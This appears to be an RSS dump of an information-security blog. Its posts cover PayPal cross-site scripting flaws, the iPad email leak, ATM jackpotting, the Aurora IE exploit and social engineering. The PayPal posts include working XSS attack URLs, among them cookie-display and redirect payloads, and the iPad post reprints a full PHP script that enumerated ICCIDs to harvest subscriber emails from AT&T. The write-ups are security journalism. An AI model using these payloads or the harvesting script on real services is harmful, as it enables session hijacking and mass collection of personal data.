Prefect – Praetorian Prefect http://www.praetorianprefect.com "Information Security, a little slower...a little deeper" Mon, 23 Mar 2015 03:40:55 +0000 en-US hourly 1 Jimmy Kimmel Gets your Password http://www.praetorianprefect.com/2015/01/jimmy-kimmel-gets-your-password/ Sun, 18 Jan 2015 02:46:20 +0000 http://www.praetorianprefect.com/?p=80 It didn’t take a whole lot of social engineering for people to give up their passwords: ask them what the password consists of (like it’s my cat’s name and birthday), ask the cat’s name, ask a deflecting question, then ask for the birthday.

]]>
A Superbowl Wifi Problem http://www.praetorianprefect.com/2014/02/a-superbowl-wifi-problem/ Sun, 02 Feb 2014 05:21:00 +0000 http://www.praetorianprefect.com/?p=6 It’s an annual puff piece, whoever is in charge of security at the Super Bowl appears on the news in front of some barrier or computer screen, talking about the number of security guards, guard dogs, or whatever else passes as some grand measure of the ‘amount’ of security being applied.

And as with Super Bowl XLVII when two students just walked right in to the game simply by acting like they belonged, a news feature on Super Bowl XLVIII shows why bragging about your security can backfire:

super-bowl-security-fail

Yup, that’s Marko’s wifi (wireless network) password in the corner of the screen on the monitor, complete with clear text password for those who don’t want to bother to break it.

]]>
Two Jokers Social Engineer their way into the Superbowl http://www.praetorianprefect.com/2013/02/two-jokers-social-engineer-their-way-into-the-superbowl/ Sun, 10 Feb 2013 05:29:18 +0000 http://www.praetorianprefect.com/?p=10 Sneaking in near press/employee access points without going thru them, zigzagging through corridors, and once carrying a box so someone opens a door for them, two jokers from Savannah State University social engineer their way into Super Bowl XLVII for the most part simply by looking like they belong.

]]>
Anonymous Releases Very Unanonymous Press Release http://www.praetorianprefect.com/2010/12/anonymous-releases-very-unanonymous-press-release/ Fri, 10 Dec 2010 06:04:07 +0000 http://www.praetorianprefect.com/?p=33 Today, December 10th, Anonymous, an Internet gathering, released a press release which you can read below. In it, a description is provided of what Anonymous is about, what Operation Payback is, and where the media is getting it wrong. Also in it, its author forgot to remove his name in the pdf’s Meta information.

anon_pressrelease2

Document Properties
Um, Alex Tapanaris…?

anon_ops_docprops

Full Press Release Text

ANON OPS: A Press Release December 10, 2010

Who is Anonymous In their most recent public statement, WikiLeaks is the only group of people to identify Anonymous correctly. Anonymous is not a group, but rather an Internet gathering.

Both Anonymous and the media that is covering it are aware of the percieved dissent between individuals in the gathering. This does not, however, mean that the command structure of Anonymous is failing for a simple reason: Anonymous has a very loose and decentralized command structure that operates on ideas rather than directives.

We do not believe that a similar movement exists in the world today and as such we have to learn by trial and error. We are now in the process of better communicating some core values to the individual atoms that comprise Anonymous – we also want to take this opportunity to communicate a message to the media, so that the average Internet Citizen can get to know who we are and what we represent.

Anonymous is not a group of hackers. We are average Interent Citizens ourselves and our motivation is a collective sense of being fed up with all the minor and major injustices we witness every day.

We do not want to steal your personal information or credit card numbers. We also do not seek to attack critical infrastructure of companies such as Mastercard, Visa, PayPal or Amazon. Our current goal is to raise awareness about WikiLeaks and the underhanded methods employed by the above companies to impair WikiLeaks’ ability to function.

What is Operation: Payback As stated above, the point of Operation: Payback was never to target critical infrastructure of any of the companies or organizations affected. Rather than doing that, we focused on their corporate websites, which is to say, their online “public face”. It is a symbolic action – as blogger and academic Evgeny Morozov put it, a legitimate expression of dissent.

The background to the attacks on PayPal and the calls to attack Amazon.com Amazon, which was until recently WikiLeaks’ DNS provider, was one of the first companies to drop support for WikiLeaks. On December 9th, BusinessInsider.com reported that Amazon.co.uk were hosting the recently leaked diplomatic cables in e-book form. (Amazon.co.uk has since ceased selling the bundle of the diplomatic cables.)

After this piece of news circulated, parts of Anonymous on Twitter asked for Amazon.com to be targetted. The attack never occured.

While it is indeed possible that Anonymous may not have been able to take Amazon.com down in a DDoS attack, this is not the only reason the attack never occured. After the attack was so advertised in the media, we felt that it would affect people such as consumers in a negative way and make them feel threatened by Anonymous. Simply put, attacking a major online retailer when people are buying presents for their loved ones, would be in bad taste.

The continuing attacks on PayPal are already tested and preferable: while not damaging their ability to process payments, they are successful in slowing their network down just enough for people to notice and thus, we achieve our goal of raising awareness.

Related Coverage

  • http://paulrankin.tumblr.com/post/2166282743/anonymous-has-supposedly-released-a-press-release
]]>
Paypal Sender Country XSS http://www.praetorianprefect.com/2010/10/paypal-sender-country-xss/ Wed, 06 Oct 2010 06:18:02 +0000 http://www.praetorianprefect.com/?p=37 A new XSS vulnerability was identified on Paypal.com earlier today, found by d3v1l and disclosed on both Security-Shell and XSSed. The problem is with the parameter sender_country in a transaction called nvpsm. NVP is Paypal’s API for Merchants to use when interacting with the Paypal web site, it stands for Name-Value Pair. SM is short for ‘send money’. A problem such as this can be used to capture a user’s session (essentially log in as that user) and perform privileged actions (money transfers) as that user, as well as send a user a valid Paypal URL but then redirect them to a malicious third party site (phishing, malware, etc.).

Attack String
The following is provided as example in the posts mentioned earlier:

https://www.paypal.com/nvpsm?amount=5.00¤cy_code=USD&sender_country=">XSS PAYLOAD

Which results in:

Javascript injected into the name value pair of sender country is reflected on the resulting page.

Javascript injected into the name value pair of sender country is reflected on the resulting page.

Paypal is reflecting the supplied script in the error message they are displaying, as seen in the HTML source of the page:

Error COWException: invalid country "">XSS PAYLOAD"

Rather then display an alert box, an actual attacker would either redirect the user as shown below, or capture and send their session cookie (a piece of text the browser stores temporarily to identify a user’s logged in session) to a third party web site.

Redirection
https://mobile.paypal.com/nvpsm?amount=50.0¤cy_code=USD&sender_country=%22%3E%22%22%3E%3E%3E%3E%3Cmeta%20http-equiv=%22Refresh%22%20content=%220;url=http://www.google.com/%22%3E%20%22%22

Session Cookie
https://www.sandbox.paypal.com/nvpsm?amount=5.00¤cy_code=USD&sender_country=">

Same javascript alert, but displaying all of the user's cookies under the PayPal domain.

Same javascript alert, but displaying all of the user’s cookies under the PayPal domain.

XSS at a High Level
While the definition is ever expanding, XSS attacks are generally considered a type of injection problem where malicious input is injected into an otherwise trusted web page causing an unexpected behavior such as sending data to or from an unknown third party web site (cross site). Because the script is being run in the context of the trusted web site, it has access to cookies such as session tokens, as well as any other user information available within the security context of that web site. XSS vulnerabilities are somewhat common in web applications and will occur unfettered wherever untrusted input is not validated by the web application or encoded before output back to the user.

PayPal
The San Jose based company is owned by eBay and has more than 78 million customer accounts. As such the service is used to clear many of the transactions on the popular auction site. The service allows users to send money without needing to share financial information, a key enabler for sending and receiving money from third parties on the Internet. They are in some 190 markets around the world and can work with 19 different currencies.

In 2008 roughly $60 billion dollars moved through Paypal’s systems.

Paypal does make available additional authentication protection in the form of a one time password token called a ’security key’ by them (similar to the ones made popular by RSA). The token costs five dollars and is available to residents of Australia, Germany, Canada, the United Kingdom and the United States. Paypal however allows a bypass of this hard token by allowing the user to enter further information such as credit card or bank number, severely impacting its effectiveness as a security measure.

Further authentication “on the front door” of the web site (the login screen) does not prevent a user session from being hijacked after authentication as is possible in a cross site scripting attack like this one.

It is worth it to note that PayPal is PCI compliant, being subject to quarterly vulnerability scans, as stated on their site.

Finally
Users have the ability to go through a process to apply for a refund from PayPal if their account is broken into, but this is not always a clean process. A site should almost never reflect (redisplay) input received from an untrusted source (“the user”), which in this case is the browser, without escaping the output. PayPal has had similar problems with cross site scripting in the past, including an incident back in March. While XSS attacks can be downplayed, a site such as PayPal that performs money transfers (for users of eBay it is basically the only way to send and receive payment) usually has to address these problems quickly. A more comprehensive approach (a shared function that encodes all output originating from untrusted input on the site) is something they could start looking towards to protect their users.

]]>
Turning an ATM into a Slot Machine http://www.praetorianprefect.com/2010/07/turning-an-atm-into-a-slot-machine/ Wed, 28 Jul 2010 06:40:51 +0000 http://www.praetorianprefect.com/?p=50 Security researcher Barnaby Jack, currently at IOActive but a veteran of Foundstone, eEye, and Juniper with almost ten years in the industry, has demonstrated two exploit methods for ATM’s (Automated Teller Machines) in a presentation that is thus far the talk of the Black Hat 2010 conference. In a discussion originally slated for last year before it was muffled by Juniper based on the concerns of “an affected ATM vendor”, Jack demonstrates what he calls jackpotting an ATM.

Here’s the ATM “jackpot” (music playing, money flying out, word ‘Jackpot’ displayed on the console):

The Attack
The attack was employed using two custom tools Jack developed: Scrooge, an ATM firmware rootkit (malicious software that conceals itself at the level of interface between software and hardware) and Dilinger (named for the famous bank robber), a remote ATM attack tool that keeps track of compromised machines and stores the data stolen from people who use the machines. The first exploit involved unlocking a panel on the ATM and inserting a USB key that overwrites the machine’s native firmware with the aforementioned rootkit, taking control of the ATM.

Research
atm_openTo perform the research, Jack acquired physical ATM machines, attached a debugger to the ATM motherboard, and proceeded to reverse engineer the machine’s firmware. He then developed a replacement version (the aforementioned Scrooge software). Firmware typically refers to the small footprint of code (programs, data structures) that provide internal control of electronic devices. In other words, think the low level operations of any electronic device.

In the models Jack tested he was able to, after accessing the machine’s USB ports with a master key purchased online, perform a replacement of the firmware with his rootkit version. The ATM’s include the ability to do this so that firmware updates can be made by those performing maintenance on the ATM. However, there is no integrity check to ensure that the code update is coming from a trusted source.

The keys themselves for the cabinets are not hard to acquire.

Mitigation
In response ATM vendors have created a new version of the firmware requiring future updates have a digital signature (essentially a shared secret between the machine and the author of code for that machine to ensure the integrity of the code update). Doing this would help to prevent the type of rogue update via USB Jack performed, as long as the signing keys are kept secret.

Breadth
While Jack wouldn’t reveal the names of the ATM vendors whose devices he compromised (they are reported to be Triton and Tranax machines), he has noted that every ATM he has tested he has compromised, intimating attacks on multiple machines are possible because of similarities in the way generic ATM machines are made. He did note the external limitations of his research, citing the fact that there are only so many ATM’s you can put in an apartment before “your girlfriend gets mad”.

Jack actually told the delivery man who brought the ATM’s that he was getting them because he wanted to avoid bank withdrawal fees.

Remote Attack
A remote attack was also demonstrated over Wifi, but many of the details have not yet been released. Jack found a way ,testing on his own machines, to bypass the remote authentication system of the ATM so that the same homemade rootkit, Scrooge, could be installed. This essentially provides access to an ATM via an Internet connection allowing for attack results such as the ability to record card and pin numbers on entry and sending them to a remote attacker). Such vulnerable ATM’s could be located with a war dialing tool, calling thousands of phone numbers until a vulnerable machine responds via modem, a technique already in play by criminals.

“Sometimes you have to demo a threat to spark a solution,”
Barnaby Jack

The image is a resonant and powerful image of insecurity, we have here a demonstrated attack that allows you to spew money out of an ATM in a few seconds, and a second that doesn’t even require physical access to the machine. At this point, the response time frame from ATM vendors as well as the vulnerability demonstrated via USB are bordering on negligence, a master key that is readily available and USB based firmware updates without any signing mechanism to ensure that it is an ‘approved’ update.

We have here, after all, a device whose sole purpose is to dispense cash.

Last year an ATM vendor got the talk pulled from BlackHat by pressuring Jack’s employer, Juniper Networks, despite having seven months of notification from Jack to arrive at some sort of response before the scheduled talk. Given we are now some one and a half years from notification, and given the quantity and dispersal of ATM’s out there, the vulnerabilities demonstrated are likely still viable.

]]>
114,000 iPad Owners: The Script that Harvested Their E-mail Addresses http://www.praetorianprefect.com/2010/06/114000-ipad-owners-the-script-that-harvested-their-e-mail-addresses/ Wed, 09 Jun 2010 07:15:04 +0000 http://www.praetorianprefect.com/?p=69 Here is the script referenced in the Gawker story from earlier that describes how a number of early iPad 3G subscribers, including names like Harvey Weinstein, Michael Bloomberg, Diane Sawyer, and Rahm Emanuel had their e-mails revealed via a poorly designed web application hosted by AT&T.

Goatse Security, named for the famous Internet shock image, wrote the script to harvest e-mail addresses by providing ICC-ID numbers (integrated circuit card identifier, a number that associates a SIM card with a subscriber) and parsing the returned e-mail address.

High profile users from the list of harvested e-mail addresses.

High profile users from the list of harvested e-mail addresses.

After speaking with Goatse Security member Weev, he was kind enough to share the script:


<?php
// iPad 3G Account Slurper
//
// Usage: ./ipadump.php ICCID-base count
// (The script generates the final checkdigit to produce ICCIDs from the entered base)
$useragent="Mozilla/5.0 (iPad)"; //Spoof as iPad
$ICCIDroot = $_SERVER['argv'][1];
$ICCIDcount = $_SERVER['argv'][2];
function genluhn($number){ //Crappy home-made Luhn checkdigit generator
$i = strlen($number)-1;
do {
$array[] = $number[$i];
$i--;
} while ($i > -1);
$i = 0;
foreach ($array as $digit) {
if (!($i & 1)){
$digit = $digit * 2;
if ($digit >= 10) {
$digit = $digit - 9;
}
}
$total = $digit;
$i ;
}
$luhn = 10 - ($total % 10);
if ($luhn == 10) $luhn=0;
return $luhn;
}
while (1) { //Continue FOREVER
$ch = curl_init(); //Set up cURL
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); //Since theres a lot of redirection
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies"); //See later
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //Returns any and all data
$ICCID = $ICCIDroot.genluhn(strval($ICCIDroot)); //Generate checkdigit and attach it to
the ICCID
curl_setopt($ch, CURLOPT_URL, "https://dcp2.att.com/OEPClient/openPage?ICCID=".strval($ICCID)."&IMEI=0");
$output = curl_exec($ch); //Load first page with ICCID
curl_setopt($ch, CURLOPT_URL, "https://dcp2.att.com/OEPClient/Customer");
$output = curl_exec($ch); //Now load page that is normally redirected with JavaScript.
cURL is nice and passes the previously GET'd info
curl_close($ch);
//print $output; //Prints HTML result
if (!($counter % 50)) echo "-".strval($ICCID)."-\n"; //Prints ICCID every 50 counts just
to keep track of how far the script has gotten
//Parse output. Terribly sloppy
if (preg_match("/<title>Error<\/title>/", $output, $match)) {
preg_match("/<div class=\"info-container\">(.*)<br>(.*)<br>/msU", $output,
$match);
$match[0] = preg_replace("/<div class=\"info-container\">\n\s\s /","",$match[0]);
$match[0] = preg_replace("/<\/b><br>/", "<\/b> <br>", $match[0]); //Because I
want space between the period and the next sentence, dammit
$errnum = strip_tags($match[0]);
$status = "Error! ".$errnum; //Return specific error message
} else if (preg_match("<input id=\"email\" name=\"email\" type=\"email\"
placeholder=\"Required\" value=\".*\@.*\" autocapitalization=\"off\" autocorrect=\"off\">",
$output, $match)) {
$match[0] = preg_replace("/input id=\"email\" name=\"email\" type=\"email\"
placeholder=\"Required\" value=\"/","",$match[0]);
$status = preg_replace("/\" autocapitalization=\"off\" autocorrect=\"off\"/", "",
$match[0]); //Return email address
} else {
$status = "Inactive"; //Assume SIM is inactive if nothing tells us otherwise. Bad
logic, will fix.
}
if ($status != "Inactive") echo strval($ICCID)." : ".$status."\n"; //Print ICCID with error
message or email address. Can print if ICCID is inactive, but it makes for a long, redundant log.
if ($counter == $ICCIDcount) exit;
$ICCIDroot ; //step ICCID
$counter ; //step loop counter
}
?>

There are probably a few things worth pointing out. They had to set the user-agent string to be the iPad as shown:

$useragent="Mozilla/5.0 (iPad)";

The vulnerable URL at att.com was:

https://dcp2.att.com/OEPClient/openPage?ICCID=Insert number here&IMEI=0

And that’s it, an e-mail address gets returned in the successful iterations (active ICCID) and parsed. There’s no complex hack, no real infiltration or passage of an authentication mechanism, and no breach, just a really poorly designed web application that returns e-mail address when ICCID is passed to it.

]]>
Thou Shalt Not Send Naked Pictures…To Anyone Ever http://www.praetorianprefect.com/2010/05/thou-shalt-not-send-naked-picturesto-anyone-ever/ Wed, 26 May 2010 05:39:22 +0000 http://www.praetorianprefect.com/?p=12 MandarinHigh-150x150It’s becoming a familiar story, an angry parent of a student reports finding inappropriate images, self taken naked pictures and videos, on that student’s cell phone. The images and video were sent to the student by a high school football coach. The mother of the student e-mailed the pictures to the administration of the high school, and the coach was promptly fired in disgrace. But this story has an unusual wrinkle: the student is a 20 year-old at the University of Central Florida, the girlfriend of 32 year-old Mandarin High School football coach Jason Robinson.

Upon finding the pictures, the mother of Jason Robinson’s college age girlfriend fired the images off to the administration at the High School employing this coach. The administration reacted by terminating Robinson, who being within the first three years of his contract there was essentially the equivalent of an “at-will” employee.

The high school principal, Dr. Donna Richardson, fired off the following letter to the coach:

“Effective today you have been reassigned to Bulls Bay for the remainder of this school year. You are not to come back onto our campus, and we will make arrangements to get any of your personal belongings to you.

You are also being non-reappointed for the next school year. It is regretful it had to come to this, but I believe you understand the situation.”

“We hold our teachers to a higher standard. They are in front of our students. They’re talking with our students. They’re teaching our students how to become good characters”

Jason Robinson

So we are left with an ‘at will’ employee, who can be dismissed for any reason, being dismissed for showing a lack of sound judgment and a potential violation of a policy (which for whatever reason couldn’t be located in time to include in the letter). From a legal standpoint, the dismissal may be on solid enough ground.

jasonrobinson

The incident is problematic on a number of fronts though. As soon as an employing organization begins to pass judgment on the private, non-criminal, non-disallowed by policy, actions of two consenting adults, they open themselves up in an inappropriate role as a moral arbiter over their teachers and staff. The mother’s actions were largely inappropriate in the absence of a crime or high school policy violation regarding relationships between teachers and staff. There has been no indication yet that this relationship started when the girlfriend was a high school student herself. But since you can’t control parents, the high school board, a group of people, owed it to all involved to display a cooler head.

Robinson is claiming this incident has ruined his reputation, and is suing the parents of his 20 year old girlfriend for violating his privacy by looking at the material. It certainly does affect his future prospects in working as a high school football coach to be so publicly dismissed.

A sister of the girlfriend does attend high school at Mandarin also, probably another reason this should have been handled much more quietly, as her life must be a joy right now.

One Wrinkle Though
There is one awkward little wrinkle to the whole episode which may make the school board right (but which throws into question why they wouldn’t comment further to defend their position). There is an allegation that the coach used a school computer to send the images. If that is the case, a policy prohibiting using school equipment to view or send pornography should both be in place and apply (minus the publicity and ‘shaming’ e-mail).

1274916964-richardson1-150x150

So why isn’t that being included in the school’s response to the case? Either because it isn’t true, or because they haven’t conducted a responsible forensics investigation to back up the allegation. To fire someone so publicly without having this was a mistake. Administrative leave, strengthening the case via proper computer forensics, and then having a full story to go forward with is the correct way to go, not an e-mail sent in haste from the principle’s computer.

According to most followup commentary, the “sent from a school computer” piece likely is not true anyway.

Sexting
Basically the act of sending a sexually explicit photograph or message with mobile phones as the communication device. The name derives from a combination (or portmanteau for those who want to learn a new word) of the words sex and texting.

The first well known reference to the word is a 2005 article in the British Sunday Telegraph Magazine. In a survey conducted by Cosmogirl, 20% of teens and 33% of young adults indicated they had sent nude or semi-nude (big difference) pictures of themselves via electronic communications. Some 39% of teens and 59% of young adults had said they sent sexually explicit messages.

The Cosmogirl results have been thrown into question however (surveys always are); at least one sociologist, C.J. Pascoe, an assistant professor at Colorado College, completed a three year study interviewing 80 teenagers and found no evidence of truly explicit text or photographs sent via mobile devices.

From personal experience, students are certainly sending and posting information that their parents and other adults would note is probably a mistake to preserve electronically and share. Campaigns, such as the James Lipton campaign we posted about earlier, Don’t Tweet Your Junk, are largely a reaction to this problem.

So there is an issue here that should not be ignored, one that naturally followed the increasing capabilities of cell phones, the decreasing costs, and the result that more young people than ever have sophisticated access to communications technology (something their parents did not by and large have). That said, hyping the numbers by suggesting that 2 out of every 10 teens are sending naked pictures of themselves via their phones is unnecessarily alarmist.

The other larger problem of overreaction is overzealous prosecution of teenagers under child pornography laws which were certainly not codified to cover teenagers e-mailing photographs to each other. Further, the classification of said teenagers or young adults as sex offenders serves only to weaken the notification requirements under Meghan’s Law, designed to protect youth against real sex predators.

Finally
I don’t understand the proclivity in the number of people sending naked pictures of their junk to other people. Maybe if doing so will result in Paris Hilton like publicity, but for most of us photographing our nether regions should be grounds for having our heads examined. That said, what we have here is two consenting adults sending content between each other. It was no more the high school’s business than it was that of the mother, unless a school computer was used.

One could make the loose case that the Mother of a 20 year-old might have the moral authority to snoop to try to keep her daughter safe (we don’t really think so at 20, but we could see someone saying that). But sending the pictures on to the high school administration rather than handing this as a private family member shows terrible judgment on the mother’s part. But parents can’t be controlled, the school had to realize a story as salacious as this would spawn media coverage, and should have had their act in order before reacting. If they have nothing, no evidence that this relationship started when the girl was underage or in high school, no use of a school computer via evidence gathered in a forensically sound manner, then this school board has made a mistake.

Or as Principal Richardson defined the school’s mission: “They’re teaching our students how to become good characters”. They’re acting like characters all right, so far anyway.

Sources:

]]>
XSS Flaw on PayPal.com http://www.praetorianprefect.com/2010/03/xss-flaw-on-paypal-com/ Fri, 26 Mar 2010 06:27:43 +0000 http://www.praetorianprefect.com/?p=43 Earlier today Wesley Kerfoot reported on the Full Disclosure mailing list that a page in the Paypal.com domain is susceptible to a non-persistent reflected cross site scripting attack (XSS). While non-persistent XSS bugs are somewhat common, this is quite serious for a site like PayPal, where user accounts are linked directly to bank accounts, debit, or credit cards and payment can be made to third parties without any additional authentication after user access is gained.

Update: As of 7pm EST, it appears that a mitigation has been implemented for this vulnerability on the PayPal web site where all requests to /xclick/business redirect to the PayPal homepage.

An attacker able to trick a user with a valid Paypal session into clicking a crafted version of the link below (wouldn’t be hard, think a link on an eBay auction listing or a phishing e-mail for example) could hijack the user’s session and initiate financial transactions on their behalf including money transfers. Alternatively this legitimate URL could be used to redirect the user to a spoofed PayPal web site designed to steal user credentials, which is a fairly common scam except in this case more effective as the user would see an actual PayPal URL to click on.

Attack String
The following string is provided as example in the Full Disclosure posting:

https://www.paypal.com/xclick/business=<script> XSS PAYLOAD </script>

Which in turn results in this:

Javascript injected as part of a name-value pair is reflected on the resulting web page.

Javascript injected as part of a name-value pair is reflected on the resulting web page.

Of course where this works, this will just as easily work:

https://www.paypal.com/xclick/business=<script> alert(document.cookie); </script>

Which dutifully reflects back wrapped in a header tag on the resulting page:

<div class="legacyErrors " id="page">
<div id="header"><h1><script> alert(document.cookie); </script></h1></div>
<hr>
<div id="content">
<div id="headline">

And finally which displays the user’s logged in session information:

The result of injecting alert(document.cookie) into the same page for a logged in PayPal user.

The result of injecting alert(document.cookie) into the same page for a logged in PayPal user.

Rather then displaying the cookies, the attacker would redirect the information to another web site, set them locally as his session, and begin to initiate transactions on the part of the user. This is only one example, since Javascript can be executed in the context of the PayPal web site, the attacker could write a script to do just about any action on the site that is possible using Javascript, Flash, etc.. Site redirects, iFrame injection, and even other injection flaws are possible on a web page that does not validate untrusted input.

XSS at a High Level
While the definition is ever expanding, XSS attacks are generally considered a type of injection problem where malicious input is injected into an otherwise trusted web page causing an unexpected behavior such as sending data to or from an unknown third party web site (cross site). Because the script is being run in the context of the trusted web site, it has access to cookies such as session tokens, as well as any other user information available within the security context of that web site. XSS vulnerabilities are somewhat common in web applications and will occur unfettered wherever untrusted input is not validated by the web application or encoded before output back to the user.

PayPal
The San Jose based company is owned by eBay and has more than 78 million customer accounts. As such the service is used to clear many of the transactions on the popular auction site. The service allows users to send money without needing to share financial information, a key enabler for sending and receiving money from third parties on the Internet. They are in some 190 markets around the world and can work with 19 different currencies.

In 2008 roughly $60 billion dollars moved through Paypal’s systems.

Paypal does make available additional authentication protection in the form of a one time password token called a ‘security key’ by them (similar to the ones made popular by RSA). The token costs five dollars and is available to residents of Australia, Germany, Canada, the United Kingdom and the United States. Paypal however allows a bypass of this hard token by allowing the user to enter further information such as credit card or bank number, severely impacting its effectiveness as a security measure.

Further authentication “on the front door” of the web site (the login screen) does not prevent a user session from being hijacked after authentication as is possible in a cross site scripting attack like this one.
PCI Compliance

Of note is that PayPal does claim PCI compliance, involving the following activities in their words:

  • Maintain a vulnerability management program
  • Pass quarterly remove vulnerability scans

The wording on that second bullet from the PayPal site is a little strange, we assume it means to pass vulnerability scans that validate whether earlier problems identified by previous scans were removed.

The attack string above is basic enough that it would or should be tested and picked up as a vulnerability by the most rudimentary web scanners available, throwing the validity of any scanning being done into question. Actual credit card data is displayed in an obfusticated manner on the Profile section of the web site (only the last four digits show up on the site), so the site may be considered out of scope of a PCI required scan?

The digital certificate of the scanalert.com URL, a redirect to the McAfee service PayPal provides to its business customers at no cost for a year, has a bad digital certificate.

Finally
Generally users can apply for refunds from PayPal when an account has been broken into, but like any other service there are a share of horror stories. In general a site such as this should escape all output that originates from untrusted sources, with the variety of possible attack strings this is not full proof but is a significant mitigation against injection attacks. This is not PayPal’s first brush with this problem, last year a similar issue was identified by Harry Sintonen. As PayPal is, for many users of eBay and other online services, the only payment game in town (the only one which a seller will use to collect payment) this type of issue needs to be corrected fairly quickly in a comprehensive manner (a site wide change to introduce web vulnerability scanning, escape all user provided input when outputted, and/or validation of all user provided input ideally).

References

  • Full Disclosure – Paypal XSS Vulnerability: http://seclists.org/fulldisclosure/2010/Mar/486
]]>
The “Aurora” IE Exploit Used Against Google in Action http://www.praetorianprefect.com/2010/01/the-aurora-ie-exploit-in-action/ Fri, 15 Jan 2010 07:24:40 +0000 http://www.praetorianprefect.com/?p=73 The big news hit earlier this week that the attack vector that allowed bad actors presumably from China into the networks of Google, Juniper, Adobe, and some 29 other firms was an Internet Explorer zero day, a use after free vulnerability on an invalid pointer reference affecting IE 6, 7, and 8 but only used by attackers on IE 6 according to Microsoft. Per Microsoft’s Advisory 979352: “In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution. Earlier today this entry from yesterday at Wepawet (an online analysis engine for malware) was pointed out to H.D. Moore, and within hours Metasploit has an exploit of the vulnerability integrated. McAfee has confirmed that the exploit is out and the same one they saw during the investigation. The video below demonstrates how crackers initially gained access to the corporate networks of Google, et al. using this zero day attack.

Here It Is
The video below demonstrates how Google and the rest have been, according to most news reports, exploited via the “Aurora” vulnerability in Internet Explorer, and had their “intellectual property” taken.

The “Aurora” IE Exploit in Action from The Crew of Praetorian Prefect on Vimeo.

In the video you will see Metasploit set up a listening session, set up a web site that serves up the malicious code, and watch as an unsuspecting user visits the web site, triggers the attack that uses the IE vulnerability, and unknowingly opens a connection to a computer owned by the attacker. The attacker then lists the user’s processes, and elects to kill Notepad where the user was working on an important document. IE 6.0 is used, as this is the version Microsoft references as having been used in the “targeted attacks” on some 30+ U.S. companies.

A silly example for demonstration to be sure, but once the backdoor is open to the user’s PC the attacker can use it as a pivot point for other attacks against the internal network, escalate his or her privileges, take information off the PC, basically do anything the user can do.

The Vector
The attack scenario is that users were pointed to a web site (probably through a targeted Spam e-mail, an attack called spear phishing) containing a JavaScript that references this invalid pointer and injects the included shell code. The code below was released publicly yesterday.

aurora_vuln

Update

  • Ahmed Obied has published a clean python version of the exploit (opens your Windows Calculator) for testing, search: ie_aurora.py.
  • CVE-2010-0249 has been opened for this issue.

Finally

“At this time, we are aware of limited, active attacks attempting to use this vulnerability against Internet Explorer 6. We have not seen attacks against other affected versions of Internet Explorer.” – Microsoft.

This situation has the potential to change rapidly now that it appears the exploit has been found. Microsoft last patched a vulnerability off cycle in July of 2009, they could elect to pursue the same response here.

Or as McAfee’s Craig Schmugar correctly opines: “What started out as a sophisticated targeted attack is likely to lead to large-scale attacks on vulnerable Microsoft Internet Explorer users.”

]]>